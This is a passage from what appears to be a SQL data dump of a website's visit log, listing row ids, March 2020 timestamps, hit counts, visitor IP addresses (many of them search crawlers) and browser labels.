96617,3,3,0,0,'66.249.64.23','chrome'),(493089,1585497532,1,1,0,0,'66.249.64.25','chrome'),(493090,1585498007,1,1,0,0,'220.184.99.212','chrome'),(493091,1585498077,2,2,0,0,'66.249.64.24','chrome'),(493092,1585498756,1,1,0,0,'207.46.13.187','other'),(493093,1585498805,1,1,0,0,'178.154.200.222','other'),(493094,1585499518,1,1,0,0,'91.196.178.134','chrome'),(493095,1585499616,1,1,0,0,'66.249.64.23','chrome'),(493096,1585499689,1,1,0,0,'66.249.64.24','chrome'),(493097,1585500012,1,1,0,0,'66.249.64.25','chrome'),(493098,1585500789,1,1,0,0,'66.249.70.36','chrome'),(493099,1585501157,1,1,0,0,'66.249.70.33','chrome'),(493100,1585501159,1,1,0,0,'66.249.64.25','chrome'),(493101,1585501917,1,1,0,0,'66.249.64.24','chrome'),(493102,1585502075,1,1,0,0,'8.29.198.25','other'),(493103,1585502107,1,1,0,0,'178.154.200.222','other'),(493104,1585502820,1,1,0,0,'8.29.198.27','other'),(493105,1585502949,1,1,0,0,'207.46.13.187','other'),(493106,1585503367,1,1,0,0,'66.249.64.25','chrome'),(493107,1585504089,1,1,0,0,'66.249.70.38','chrome'),(493108,1585504097,2,2,0,0,'66.249.64.23','chrome'),(493109,1585504540,2,2,0,0,'66.249.64.25','chrome'),(493110,1585505331,1,1,0,0,'37.203.7.227','chrome'),(493111,1585505521,1,1,0,0,'66.249.64.25','chrome'),(493112,1585505792,1,1,0,0,'183.192.32.30','chrome'),(493113,1585506250,1,1,0,0,'117.172.84.229','chrome'),(493114,1585506265,1,1,0,0,'66.249.64.24','chrome'),(493115,1585506306,1,1,0,0,'182.109.218.43','chrome'),(493116,1585506659,2,2,0,0,'46.219.204.145','chrome'),(493117,1585507170,1,1,0,0,'94.153.67.169','chrome'),(493118,1585507595,1,1,0,0,'207.46.13.187','other'),(493119,1585507888,1,1,0,0,'66.249.70.33','chrome'),(493120,1585507962,1,1,0,0,'183.94.208.47','chrome'),(493121,1585508227,1,1,0,0,'183.166.99.250','chrome'),(493122,1585508257,1,0,1,0,'157.55.39.22',''),(493123,1585508261,2,2,0,0,'66.249.64.24','chrome'),(493124,1585509879,8,8,0,0,'77.120.98.235','other'),(493125,1585509901,8,8,0,0,'178.151.26.140','other'),(493126,1585509944,1,1,0,0,'66.249.64.23','chrome'),(493127,1585509982,1,1,0,0,'157.55.39.22','other'),(493128,1585510366,1,1,0,0,'66.249.64.25','chrome'),(493129,1585510424,1,1,0,0,'66.249.64.24','chrome'),(493130,1585511023,1,1,0,0,'66.249.64.23','chrome'),(493131,1585511077,1,1,0,0,'157.55.39.22','other'),(493132,1585511151,1,1,0,0,'207.46.13.187','other'),(493133,1585511308,1,1,0,0,'182.244.168.20','chrome'),(493134,1585511404,1,1,0,0,'66.249.64.24','chrome'),(493135,1585511585,2,2,0,0,'66.70.160.92','msie'),(493136,1585512729,1,1,0,0,'178.154.200.236','other'),(493137,1585512896,1,1,0,0,'8.29.198.25','other'),(493138,1585513181,2,2,0,0,'66.249.64.23','chrome'),(493139,1585513288,1,1,0,0,'66.249.64.25','chrome'),(493140,1585513644,1,1,0,0,'8.29.198.26','other'),(493141,1585513835,1,1,0,0,'61.138.222.123','chrome'),(493142,1585514251,1,1,0,0,'173.252.111.9','other'),(493143,1585514264,1,1,0,0,'91.196.178.153','chrome'),(493144,1585514589,1,1,0,0,'66.249.64.23','chrome'),(493145,1585515553,1,1,0,0,'66.249.64.23','chrome'),(493146,1585516695,38,38,0,0,'34.66.64.45','firefox'),(493147,1585516701,2,2,0,0,'34.66.64.45','other'),(493148,1585517857,1,1,0,0,'66.249.70.36','chrome'),(493149,1585517929,2,2,0,0,'66.249.64.25','chrome'),(493150,1585517966,1,1,0,0,'114.99.160.95','chrome'),(493151,1585517982,2,2,0,0,'66.249.64.23','chrome'),(493152,1585518115,1,1,0,0,'123.163.21.95','chrome'),(493153,1585519193,1,1,0,0,'66.249.64.25','chrome'),(493154,1585519603,38,38,0,0,'34.66.64.45','firefox'),(493155,1585519609,2,2,0,0,'34.66.64.45','other'),(493156,1585520093,1,1,0,0,'66.249.64.24','chrome'),(493157,1585522075,2,2,0,0,'66.249.64.23','chrome'),(493158,1585522673,1,1,0,0,'66.249.64.25','chrome'),(493159,1585523747,1,1,0,0,'8.29.198.25','other'),(493160,1585523802,2,2,0,0,'66.249.64.25','chrome'),(493161,1585524275,2,2,0,0,'157.55.39.22','other'),(493162,1585524479,1,1,0,0,'8.29.198.27','other'),(493163,1585524717,1,1,0,0,'213.180.203.29','other'),(493164,1585524906,1,1,0,0,'66.249.64.25','chrome'),(493165,1585525206,1,1,0,0,'17.58.101.25','other'),(493166,1585525303,1,1,0,0,'157.55.39.22','other'),(493167,1585525329,7,7,0,0,'3.235.75.196','other'),(493168,1585526107,1,1,0,0,'62.205.134.182','other'),(493169,1585526345,8,8,0,0,'3.235.75.196','other'),(493170,1585526903,1,1,0,0,'49.71.143.254','chrome'),(493171,1585527340,9,9,0,0,'3.235.75.196','other'),(493172,1585527733,1,1,0,0,'117.68.193.74','chrome'),(493173,1585527961,1,1,0,0,'111.73.242.223','chrome'),(493174,1585528405,1,1,0,0,'66.249.64.25','chrome'),(493175,1585528526,6,6,0,0,'3.235.75.196','other'),(493176,1585528921,1,1,0,0,'66.249.64.24','chrome'),(493177,1585528961,1,1,0,0,'66.249.64.23','chrome'),(493178,1585529373,1,1,0,0,'66.249.64.25','chrome'),(493179,1585529441,7,7,0,0,'3.235.75.196','other'),(493180,1585529649,1,1,0,0,'222.189.144.253','chrome'),(493181,1585530395,7,7,0,0,'3.235.75.196','other'),(493182,1585530483,1,1,0,0,'91.209.11.236','other'),(493183,1585531037,1,1,0,0,'66.249.64.25','chrome'),(493184,1585531085,2,2,0,0,'66.249.64.24','chrome'),(493185,1585531447,1,1,0,0,'49.87.135.54','chrome'),(493186,1585531528,1,1,0,0,'157.55.39.22','other'),(493187,1585531532,1,1,0,0,'157.55.39.174','other'),(493188,1585531569,1,1,0,0,'110.52.224.53','chrome'),(493189,1585531585,7,7,0,0,'3.235.75.196','other'),(493190,1585531742,1,1,0,0,'66.249.64.23','chrome'),(493191,1585531915,3,3,0,0,'66.249.70.36','chrome'),(493192,1585532212,1,1,0,0,'213.180.203.90','other'),(493193,1585532349,2,2,0,0,'66.249.64.25','chrome'),(493194,1585532504,3,3,0,0,'3.235.75.196','other'),(493195,1585532831,8,8,0,0,'77.120.98.235','other'),(493196,1585532928,1,1,0,0,'114.238.16.179','chrome'),(493197,1585533007,1,1,0,0,'207.46.13.187','other'),(493198,1585533684,1,1,0,0,'66.249.64.23','chrome'),(493199,1585534129,1,1,0,0,'66.249.64.25','chrome'),(493200,1585534572,1,1,0,0,'8.29.198.26','other'),(493201,1585534636,1,1,0,0,'178.154.200.110','other'),(493202,1585535033,2,2,0,0,'157.55.39.174','other'),(493203,1585535311,1,1,0,0,'8.29.198.25','other'),(493204,1585535615,2,2,0,0,'66.249.64.25','chrome'),(493205,1585535686,2,2,0,0,'66.249.64.24','chrome'),(493206,1585536742,1,0,1,0,'157.55.39.22',''),(493207,1585537263,1,1,0,0,'213.180.203.109','other'),(493208,1585537460,1,1,0,0,'178.154.200.236','other'),(493209,1585537673,1,1,0,0,'66.249.64.23','chrome'),(493210,1585538478,1,1,0,0,'157.55.39.174','other'),(493211,1585539389,1,1,0,0,'213.180.203.109','other'),(493212,1585539437,1,1,0,0,'49.87.201.87','chrome'),(493213,1585539589,1,0,1,0,'66.249.64.23',''),(493214,1585539731,1,1,0,0,'60.169.240.26','chrome'),(493215,1585539750,1,1,0,0,'36.159.130.14','chrome'),(493216,1585540108,1,1,0,0,'112.87.5.216','chrome'),(493217,1585540283,1,1,0,0,'178.133.107.122','chrome'),(493218,1585540362,1,1,0,0,'123.130.102.196','chrome'),(493219,1585540554,1,0,1,0,'207.46.13.187',''),(493220,1585540580,1,1,0,0,'66.249.64.24','chrome'),(493221,1585541276,1,1,0,0,'157.55.39.106','other'),(493222,1585541824,1,1,0,0,'178.154.200.119','other'),(493223,1585543262,1,1,0,0,'62.205.134.182','other'),(493224,1585543364,1,1,0,0,'178.154.200.91','other'),(493225,1585543760,1,1,0,0,'46.219.204.145','chrome'),(493226,1585543786,2,2,0,0,'157.55.39.106','other'),(493227,1585543895,1,0,1,0,'157.55.39.22',''),(493228,1585543910,1,1,0,0,'106.57.7.246','chrome'),(493229,1585544009,1,1,0,0,'207.46.13.187','other'),(493230,1585544466,1,1,0,0,'178.154.200.236','other'),(493231,1585544976,1,1,0,0,'157.55.39.106','other'),(493232,1585545405,2,2,0,0,'8.29.198.26','other'),(493233,1585545523,1,1,0,0,'207.46.13.248','other'),(493234,1585545535,1,0,1,0,'157.55.39.22',''),(493235,1585545829,1,1,0,0,'66.249.64.25','chrome'),(493236,1585545860,2,2,0,0,'66.249.64.24','chrome'),(493237,1585547295,2,2,0,0,'94.153.81.114','chrome'),(493238,1585547427,1,1,0,0,'66.249.64.25','chrome'),(493239,1585547497,1,1,0,0,'66.249.64.24','chrome'),(493240,1585547610,1,1,0,0,'91.196.178.175','chrome'),(493241,1585547868,1,1,0,0,'31.13.127.17','other'),(493242,1585547870,1,1,0,0,'31.13.127.12','other'),(493243,1585547871,2,2,0,0,'31.13.127.18','other'),(493244,1585547874,1,1,0,0,'31.13.127.11','other'),(493245,1585547875,1,1,0,0,'31.13.127.3','other'),(493246,1585547908,1,1,0,0,'31.13.127.6','other'),(493248,1585547962,1,1,0,0,'66.249.64.23','chrome'),(493249,1585548112,1,1,0,0,'91.196.178.118','chrome'),(493250,1585548225,2,2,0,0,'94.153.81.114','chrome'),(493251,1585548599,1,1,0,0,'66.249.64.25','chrome'),(493252,1585549242,1,1,0,0,'213.180.203.29','other'),(493253,1585549274,1,1,0,0,'66.249.64.23','chrome'),(493254,1585549650,1,1,0,0,'94.153.81.114','chrome'),(493255,1585549940,2,2,0,0,'91.196.178.169','chrome'),(493256,1585550077,1,1,0,0,'66.249.70.33','chrome'),(493257,1585550120,2,2,0,0,'91.196.178.153','chrome'),(493258,1585550836,1,1,0,0,'91.196.178.188','chrome'),(493259,1585551189,3,3,0,0,'66.249.64.23','chrome'),(493260,1585551240,1,1,0,0,'223.241.21.205','chrome'),(493261,1585551506,2,2,0,0,'157.55.39.174','other'),(493262,1585551513,1,1,0,0,'91.196.178.74','chrome'),(493263,1585551562,1,1,0,0,'66.249.64.24','chrome'),(493264,1585551662,1,1,0,0,'114.239.42.126','chrome'),(493265,1585551766,1,1,0,0,'88.155.87.250','chrome'),(493266,1585551819,1,1,0,0,'94.153.24.254','chrome'),(493267,1585552220,1,1,0,0,'66.249.70.36','chrome'),(493268,1585552826,1,1,0,0,'207.46.13.187','other'),(493269,1585552842,2,2,0,0,'157.55.39.106','other'),(493270,1585552848,1,1,0,0,'114.101.246.36','chrome'),(493271,1585552905,1,1,0,0,'157.55.39.22','other'),(493272,1585552910,1,1,0,0,'157.55.39.174','other'),(493273,1585553079,1,1,0,0,'66.249.64.24','chrome'),(493274,1585553311,1,1,0,0,'91.196.178.74','chrome'),(493275,1585553704,1,1,0,0,'213.180.203.16','other'),(493276,1585553767,1,1,0,0,'66.249.70.38','chrome'),(493277,1585554136,1,1,0,0,'60.168.80.163','chrome'),(493278,1585554239,1,1,0,0,'91.196.178.74','chrome'),(493279,1585554283,2,2,0,0,'66.249.64.23','chrome'),(493280,1585554461,8,8,0,0,'77.120.98.235','other'),(493281,1585554915,1,1,0,0,'78.154.161.134','chrome'),(493282,1585555820,2,2,0,0,'66.249.64.25','chrome'),(493283,1585556202,1,1,0,0,'66.249.64.24','chrome'),(493284,1585556225,1,1,0,0,'8.29.198.25','other'),(493285,1585556656,1,1,0,0,'114.99.177.101','chrome'),(493286,1585556926,2,2,0,0,'66.249.64.25','chrome'),(493287,1585556964,1,1,0,0,'8.29.198.26','other'),(493288,1585557200,1,1,0,0,'91.196.178.175','chrome'),(493289,1585557437,1,1,0,0,'66.249.64.24','chrome'),(493290,1585557764,1,1,0,0,'66.249.70.38','chrome'),(493291,1585557924,1,1,0,0,'157.55.39.106','other'),(493292,1585559609,1,1,0,0,'88.155.87.250','chrome'),(493293,1585559678,1,1,0,0,'66.249.64.23','chrome'),(493294,1585559966,2,2,0,0,'66.249.64.25','chrome'),(493295,1585560138,1,1,0,0,'66.249.64.24','chrome'),(493296,1585560350,1,1,0,0,'66.249.70.36','chrome'),(493297,1585560378,1,1,0,0,'157.55.39.174','other'),(493298,1585560624,2,2,0,0,'66.249.64.23','chrome'),(493299,1585561847,1,1,0,0,'66.249.64.24','chrome'),(493300,1585562284,2,2,0,0,'157.55.39.174','other'),(493301,1585562361,1,1,0,0,'54.147.117.157','chrome'),(493302,1585563128,2,2,0,0,'91.196.178.162','chrome'),(493303,1585563308,1,1,0,0,'223.242.229.204','chrome'),(493304,1585563566,1,1,0,0,'66.249.64.24','chrome'),(493305,1585563586,1,1,0,0,'66.249.64.23','chrome'),(493306,1585563606,1,1,0,0,'182.87.190.132','chrome'),(493307,1585563657,2,2,0,0,'66.249.64.25','chrome'),(493308,1585564850,1,0,1,0,'157.55.39.174',''),(493309,1585565152,1,1,0,0,'58.19.82.115','chrome'),(493310,1585565300,1,1,0,0,'115.60.46.183','chrome'),(493311,1585565586,1,1,0,0,'157.55.39.174','other'),(493312,1585565719,1,1,0,0,'114.239.147.96','chrome'),(493313,1585565874,2,2,0,0,'66.249.64.23','chrome'),(493314,1585566042,1,1,0,0,'157.55.39.106','other'),(493315,1585566233,1,1,0,0,'178.154.171.127','other'),(493316,1585566296,1,1,0,0,'157.55.39.22','other'),(493317,1585566462,73,73,0,0,'204.12.197.234','other'),(493318,1585566620,2,2,0,0,'66.249.64.24','chrome'),(493319,1585567044,2,2,0,0,'8.29.198.27','other'),(493320,1585567632,1,1,0,0,'157.55.39.22','other'),(493321,1585567949,1,1,0,0,'115.49.223.221','chrome'),(493322,1585568268,1,1,0,0,'66.249.70.36','chrome'),(493323,1585569093,2,2,0,0,'66.249.64.25','chrome'),(493324,1585569249,1,1,0,0,'51.68.152.26','chrome'),(493325,1585569283,1,1,0,0,'109.74.154.72','chrome'),(493326,1585569337,2,2,0,0,'157.55.39.174','other'),(493327,1585569730,1,1,0,0,'112.113.152.222','chrome'),(493328,1585570402,1,1,0,0,'66.249.64.25','chrome'),(493329,1585570531,1,1,0,0,'66.249.70.33','chrome'),(493330,1585571049,1,1,0,0,'66.249.64.23','chrome'),(493331,1585571288,1,1,0,0,'182.99.153.254','chrome'),(493332,1585571442,1,1,0,0,'66.249.64.24','chrome'),(493333,1585571756,2,2,0,0,'157.55.39.106','other'),(493334,1585571757,1,1,0,0,'91.196.178.74','chrome'),(493335,1585571907,1,1,0,0,'95.132.31.107','chrome'),(493336,1585572728,1,1,0,0,'66.249.70.33','chrome'),(493337,1585572738,1,1,0,0,'66.249.70.36','chrome'),(493338,1585572763,1,1,0,0,'131.220.6.152','chrome'),(493339,1585573414,1,1,0,0,'66.249.64.24','chrome'),(493340,1585573780,1,1,0,0,'114.104.17.225','chrome'),(493341,1585573943,1,1,0,0,'157.55.39.106','other'),(493342,1585574088,1,1,0,0,'91.196.178.74','chrome'),(493343,1585574357,3,3,0,0,'66.249.70.36','chrome'),(493344,1585574417,1,1,0,0,'218.91.112.189','chrome'),(493345,1585574457,2,2,0,0,'66.249.70.33','chrome'),(493346,1585574934,1,1,0,0,'46.219.60.135','firefox'),(493347,1585575084,2,2,0,0,'66.249.64.23','chrome'),(493348,1585575114,2,2,0,0,'66.249.64.24','chrome'),(493349,1585575243,2,2,0,0,'157.55.39.174','other'),(493350,1585576186,2,2,0,0,'66.249.64.25','chrome'),(493351,1585576558,2,2,0,0,'5.9.156.20','other'),(493352,1585576783,3,3,0,0,'66.249.64.23','chrome'),(493353,1585577198,1,1,0,0,'157.55.39.174','other'),(493354,1585577208,1,1,0,0,'66.249.64.25','chrome'),(493355,1585577877,1,1,0,0,'8.29.198.26','other'),(493356,1585578134,1,1,0,0,'182.247.178.169','chrome'),(493357,1585578192,2,2,0,0,'157.55.39.22','other'),(493358,1585578635,1,1,0,0,'8.29.198.25','other'),(493359,1585578765,1,1,0,0,'66.249.64.24','chrome'),(493360,1585578775,1,1,0,0,'66.249.64.23','chrome'),(493361,1585579270,1,1,0,0,'222.220.153.163','chrome'),(493362,1585579808,1,1,0,0,'87.250.224.83','other'),(493363,1585579809,1,1,0,0,'141.8.183.7','other'),(493364,1585579881,1,1,0,0,'66.249.64.23','chrome'),(493365,1585580162,1,1,0,0,'178.154.200.222','other'),(493366,1585581101,2,2,0,0,'66.249.64.23','chrome'),(493367,1585581111,2,2,0,0,'66.249.64.24','chrome'),(493368,1585581190,2,2,0,0,'157.55.39.174','other'),(493369,1585581505,1,1,0,0,'66.249.70.36','chrome'),(493370,1585581727,1,1,0,0,'157.55.39.106','other'),(493371,1585581821,1,1,0,0,'64.246.165.190','firefox'),(493372,1585581960,1,1,0,0,'157.55.39.22','other'),(493373,1585582023,1,1,0,0,'157.55.39.9','other'),(493374,1585582111,1,1,0,0,'1.80.247.125','chrome'),(493375,1585582410,1,1,0,0,'58.249.80.169','chrome'),(493376,1585582506,1,0,1,0,'144.76.78.3',''),(493377,1585582577,1,1,0,0,'66.249.64.23','chrome'),(493378,1585582782,1,1,0,0,'157.55.39.106','other'),(493379,1585582875,1,1,0,0,'157.55.39.174','other'),(493380,1585583312,1,1,0,0,'115.239.26.249','chrome'),(493381,1585583606,1,1,0,0,'88.155.186.247','other'),(493382,1585583720,1,1,0,0,'66.249.64.24','chrome'),(493383,1585583887,1,1,0,0,'157.55.39.174','other'),(493384,1585585603,1,1,0,0,'1.182.212.40','chrome'),(493385,1585586027,1,1,0,0,'213.180.203.189','other'),(493386,1585586169,1,1,0,0,'157.55.39.174','other'),(493387,1585586334,1,1,0,0,'66.249.64.25','chrome'),(493388,1585586381,1,1,0,0,'91.196.178.92','firefox'),(493389,1585586534,1,1,0,0,'223.241.21.128','chrome'),(493390,1585587148,2,2,0,0,'157.55.39.174','other'),(493391,1585587354,1,1,0,0,'66.249.64.25','chrome'),(493392,1585587429,2,2,0,0,'157.55.39.106','other'),(493393,1585587479,1,1,0,0,'66.249.64.23','chrome'),(493394,1585587590,1,1,0,0,'157.55.39.22','other'),(493395,1585587819,1,1,0,0,'183.228.39.237','chrome'),(493396,1585587926,1,1,0,0,'178.154.200.196','other'),(493397,1585588136,1,1,0,0,'66.249.64.24','chrome'),(493398,1585588404,1,1,0,0,'157.55.39.106','other'),(493399,1585588545,1,0,1,0,'157.55.39.174',''),(493400,1585588708,1,1,0,0,'8.29.198.27','other'),(493401,1585589172,1,1,0,0,'173.252.111.5','other'),(493402,1585589464,1,1,0,0,'66.249.64.23','chrome'),(493403,1585589472,1,1,0,0,'8.29.198.26','other'),(493404,1585589508,1,1,0,0,'157.55.39.174','other'),(493405,1585589573,1,1,0,0,'157.55.39.9','other'),(493406,1585589768,8,8,0,0,'77.120.98.235','other'),(493407,1585589818,1,1,0,0,'157.55.39.106','other'),(493408,1585590576,1,1,0,0,'66.249.64.25','chrome'),(493409,1585591117,1,1,0,0,'91.196.178.27','chrome'),(493410,1585591652,1,0,1,0,'157.55.39.106',''),(493411,1585591677,1,1,0,0,'178.154.200.222','other'),(493412,1585592057,2,2,0,0,'157.55.39.106','other'),(493413,1585592701,3,3,0,0,'157.55.39.174','other'),(493414,1585592862,1,1,0,0,'66.249.64.23','chrome'),(493415,1585592865,1,1,0,0,'157.55.39.22','other'),(493416,1585593489,1,1,0,0,'157.55.39.9','other'),(493417,1585593493,1,1,0,0,'157.55.39.106','other'),(493418,1585593569,1,1,0,0,'173.252.111.23','other'),(493419,1585593570,1,1,0,0,'173.252.111.8','other'),(493420,1585594116,4,4,0,0,'13.82.84.196','other'),(493421,1585594783,1,1,0,0,'66.249.64.24','chrome'),(493422,1585595299,1,0,1,0,'157.55.39.22',''),(493423,1585595740,1,1,0,0,'157.55.39.22','other'),(493424,1585596565,1,1,0,0,'45.158.246.195','chrome'),(493425,1585597204,2,2,0,0,'178.154.200.222','other'),(493426,1585597270,1,0,1,0,'157.55.39.9',''),(493427,1585597414,2,2,0,0,'157.55.39.106','other'),(493428,1585598131,1,1,0,0,'88.155.122.236','chrome'),(493429,1585598403,1,1,0,0,'178.154.200.222','other'),(493430,1585598779,1,1,0,0,'91.196.178.117','chrome'),(493431,1585599065,1,1,0,0,'91.196.178.98','chrome'),(493432,1585599434,1,1,0,0,'157.55.39.174','other'),(493433,1585599537,2,2,0,0,'8.29.198.26','other'),(493434,1585599673,2,2,0,0,'157.55.39.9','other'),(493435,1585600273,2,2,0,0,'95.213.141.126','opera'),(493436,1585601213,2,2,0,0,'157.55.39.174','other'),(493437,1585603538,2,2,0,0,'157.55.39.174','other'),(493438,1585603780,1,1,0,0,'66.249.64.23','chrome'),(493439,1585604158,2,2,0,0,'157.55.39.106','other'),(493440,1585604195,3,3,0,0,'66.249.64.25','chrome'),(493441,1585604900,1,0,1,0,'157.55.39.22',''),(493442,1585605131,1,1,0,0,'66.249.64.23','chrome'),(493443,1585605361,1,0,1,0,'66.249.64.24',''),(493444,1585606418,1,1,0,0,'157.55.39.174','other'),(493445,1585606601,1,1,0,0,'112.237.43.145','chrome'),(493446,1585607342,1,1,0,0,'66.249.64.25','chrome'),(493447,1585607456,1,1,0,0,'173.252.111.7','other'),(493448,1585607748,1,1,0,0,'27.40.126.196','chrome'),(493449,1585608080,1,1,0,0,'66.249.64.24','chrome'),(493450,1585608320,1,1,0,0,'157.55.39.22','other'),(493451,1585608519,1,1,0,0,'157.55.39.106','other'),(493452,1585608593,1,1,0,0,'66.249.64.25','chrome'),(493453,1585608793,2,2,0,0,'178.154.200.222','other'),(493454,1585609460,1,1,0,0,'157.55.39.106','other'),(493455,1585610055,1,1,0,0,'213.180.203.16','other'),(493456,1585610083,1,1,0,0,'66.249.64.25','chrome'),(493457,1585610148,8,8,0,0,'77.120.98.235','other'),(493458,1585610218,1,1,0,0,'157.55.39.9','other'),(493459,1585610369,2,2,0,0,'8.29.198.26','other'),(493460,1585610444,2,2,0,0,'157.55.39.106','other'),(493461,1585610475,1,1,0,0,'178.159.37.88','chrome'),(493462,1585611503,1,1,0,0,'123.130.103.153','chrome'),(493463,1585611870,1,0,1,0,'157.55.39.22',''),(493464,1585612188,1,1,0,0,'157.55.39.174','other'),(493465,1585612506,1,1,0,0,'62.205.134.182','other'),(493466,1585612600,1,0,1,0,'66.249.64.23',''),(493467,1585613052,1,1,0,0,'213.180.203.148','other'),(493468,1585614424,1,1,0,0,'66.249.64.24','chrome'),(493469,1585614529,1,1,0,0,'157.55.39.106','other'),(493470,1585614554,1,1,0,0,'66.249.64.25','chrome'),(493471,1585614674,1,1,0,0,'66.249.70.33','chrome'),(493472,1585615182,1,1,0,0,'61.166.41.119','chrome'),(493473,1585616251,1,1,0,0,'182.247.179.108','chrome'),(493474,1585616274,1,1,0,0,'111.73.241.155','chrome'),(493475,1585616866,1,1,0,0,'66.249.64.23','chrome'),(493476,1585617359,1,1,0,0,'183.209.115.79','chrome'),(493477,1585617371,1,1,0,0,'119.185.238.39','chrome'),(493478,1585617694,1,1,0,0,'66.249.64.24','chrome'),(493479,1585618240,1,1,0,0,'66.249.64.23','chrome'),(493480,1585618360,1,1,0,0,'125.105.243.116','chrome'),(493481,1585618491,1,1,0,0,'178.154.200.222','other'),(493482,1585619623,2,2,0,0,'66.249.64.23','chrome'),(493483,1585619746,1,1,0,0,'66.249.64.25','chrome'),(493484,1585619866,2,2,0,0,'66.249.70.33','chrome'),(493485,1585620506,1,1,0,0,'157.55.39.9','other'),(493486,1585621019,1,1,0,0,'66.249.64.23','chrome'),(493487,1585621038,2,2,0,0,'66.249.64.24','chrome'),(493488,1585621200,1,1,0,0,'8.29.198.26','other'),(493489,1585621359,1,1,0,0,'66.249.70.36','chrome'),(493490,1585621696,1,1,0,0,'66.249.70.38','chrome'),(493491,1585621716,2,2,0,0,'157.55.39.106','other'),(493492,1585621967,1,1,0,0,'8.29.198.27','other'),(493493,1585622257,2,2,0,0,'66.249.64.24','chrome'),(493494,1585622772,2,2,0,0,'178.154.200.222','other'),(493495,1585622835,1,1,0,0,'66.249.64.23','chrome'),(493496,1585623806,1,1,0,0,'157.55.39.9','other'),(493497,1585623825,1,1,0,0,'209.97.157.124','other'),(493498,1585624279,1,1,0,0,'66.249.64.24','chrome'),(493499,1585624581,1,1,0,0,'66.249.64.25','chrome'),(493500,1585625034,1,0,1,0,'157.55.39.22',''),(493501,1585625383,3,3,0,0,'66.249.64.24','chrome'),(493502,1585625632,3,3,0,0,'66.249.64.25','chrome'),(493503,1585625976,2,2,0,0,'66.249.64.23','chrome'),(493504,1585626771,1,1,0,0,'66.249.64.25','chrome'),(493505,1585627054,1,1,0,0,'209.17.96.154','other'),(493506,1585627660,1,1,0,0,'66.249.64.24','chrome'),(493507,1585627858,2,2,0,0,'66.249.64.25','chrome'),(493508,1585628027,1,1,0,0,'66.249.64.23','chrome'),(493509,1585628357,1,1,0,0,'157.55.39.22','other'),(493510,1585629055,1,0,1,0,'66.249.64.23',''),(493511,1585629462,3,3,0,0,'66.249.64.24','chrome'),(493512,1585629589,1,1,0,0,'62.205.134.182','other'),(493513,1585629599,1,1,0,0,'66.249.64.23','chrome'),(493514,1585630228,1,1,0,0,'66.249.70.33','chrome'),(493515,1585630261,1,1,0,0,'66.249.70.36','chrome'),(493516,1585630886,1,1,0,0,'157.55.39.9','other'),(493517,1585630975,1,1,0,0,'213.180.203.16','other'),(493518,1585631064,8,8,0,0,'77.120.98.235','other'),(493519,1585631243,1,1,0,0,'66.249.70.33','chrome'),(493520,1585631433,1,1,0,0,'66.249.70.38','chrome'),(493521,1585631651,2,2,0,0,'66.249.64.24','chrome'),(493522,1585632034,1,1,0,0,'8.29.198.25','other'),(493523,1585632340,1,1,0,0,'66.249.70.36','chrome'),(493524,1585632566,2,2,0,0,'66.249.64.23','chrome'),(493525,1585632645,2,2,0,0,'91.196.178.87','chrome'),(493526,1585632800,1,1,0,0,'8.29.198.27','other'),(493527,1585632942,1,1,0,0,'66.249.64.25','chrome'),(493528,1585632986,2,2,0,0,'178.154.200.222','other'),(493529,1585633150,2,2,0,0,'66.249.64.24','chrome'),(493530,1585634058,2,2,0,0,'66.249.64.23','chrome'),(493531,1585634159,1,1,0,0,'213.180.203.16','other'),(493532,1585634256,1,1,0,0,'66.249.70.38','chrome'),(493533,1585634317,1,1,0,0,'66.249.70.33','chrome'),(493534,1585634531,1,1,0,0,'157.55.39.22','other'),(493535,1585634671,1,1,0,0,'91.196.178.35','chrome'),(493536,1585634969,2,2,0,0,'66.249.64.23','chrome'),(493537,1585635694,1,1,0,0,'157.55.39.22','other'),(493538,1585635778,1,1,0,0,'178.154.200.222','other'),(493539,1585636752,2,2,0,0,'66.249.64.25','chrome'),(493540,1585637262,1,1,0,0,'51.158.161.141','firefox'),(493541,1585637861,1,1,0,0,'31.13.127.14','other'),(493542,1585637863,1,1,0,0,'31.13.127.7','other'),(493543,1585637924,1,1,0,0,'157.55.39.9','other'),(493544,1585638122,1,1,0,0,'178.154.200.222','other'),(493545,1585638191,1,1,0,0,'66.249.64.25','chrome'),(493546,1585638958,2,2,0,0,'157.55.39.22','other'),(493547,1585639140,1,0,1,0,'66.249.70.33',''),(493548,1585639194,1,1,0,0,'66.249.64.23','chrome'),(493549,1585639431,1,1,0,0,'157.55.39.249','other'),(493550,1585640221,1,1,0,0,'91.214.208.42','chrome'),(493551,1585640322,1,1,0,0,'188.166.116.151','chrome'),(493552,1585640369,2,2,0,0,'66.249.64.23','chrome'),(493553,1585640463,1,1,0,0,'66.249.70.33','chrome'),(493554,1585641550,2,2,0,0,'66.249.70.36','chrome'),(493555,1585641564,6,6,0,0,'66.249.64.24','chrome'),(493556,1585642036,2,2,0,0,'66.249.64.23','chrome'),(493557,1585642863,2,2,0,0,'8.29.198.27','other'),(493558,1585642996,1,1,0,0,'91.196.178.27','chrome'),(493559,1585643045,2,2,0,0,'66.249.64.23','chrome'),(493560,1585643776,1,1,0,0,'213.180.203.16','other'),(493561,1585643990,2,2,0,0,'66.249.64.23','chrome'),(493562,1585644443,1,1,0,0,'157.55.39.249','other'),(493563,1585644948,1,1,0,0,'66.249.64.23','chrome'),(493564,1585645215,1,1,0,0,'91.196.177.46','chrome'),(493565,1585645254,1,1,0,0,'66.249.70.38','chrome'),(493566,1585645534,1,1,0,0,'207.46.13.43','other'),(493567,1585645730,1,1,0,0,'91.196.178.66','chrome'),(493568,1585645826,1,1,0,0,'91.196.178.66','msie'),(493569,1585646494,1,1,0,0,'157.55.39.22','other'),(493570,1585646853,1,1,0,0,'157.55.39.9','other'),(493571,1585646906,1,1,0,0,'3.232.129.139','chrome'),(493572,1585646963,1,1,0,0,'213.180.203.16','other'),(493573,1585647639,2,1,1,0,'66.249.64.25',''),(493574,1585647660,5,5,0,0,'66.249.64.24','chrome'),(493575,1585648214,1,0,1,0,'66.249.64.23',''),(493576,1585648307,1,1,0,0,'66.249.64.23','chrome'),(493577,1585648605,4,4,0,0,'66.249.64.24','chrome'),(493578,1585648763,1,1,0,0,'91.196.178.176','chrome'),(493579,1585649233,1,1,0,0,'178.154.200.222','other'),(493580,1585649388,1,1,0,0,'66.249.64.23','chrome'),(493581,1585649863,1,1,0,0,'66.249.70.36','chrome'),(493582,1585649868,1,1,0,0,'66.249.64.24','chrome'),(493583,1585649903,1,1,0,0,'157.55.39.9','other'),(493584,1585650336,1,1,0,0,'178.154.200.222','other'),(493585,1585651063,3,3,0,0,'66.249.64.24','chrome'),(493586,1585651315,1,1,0,0,'91.196.178.176','chrome'),(493587,1585652148,1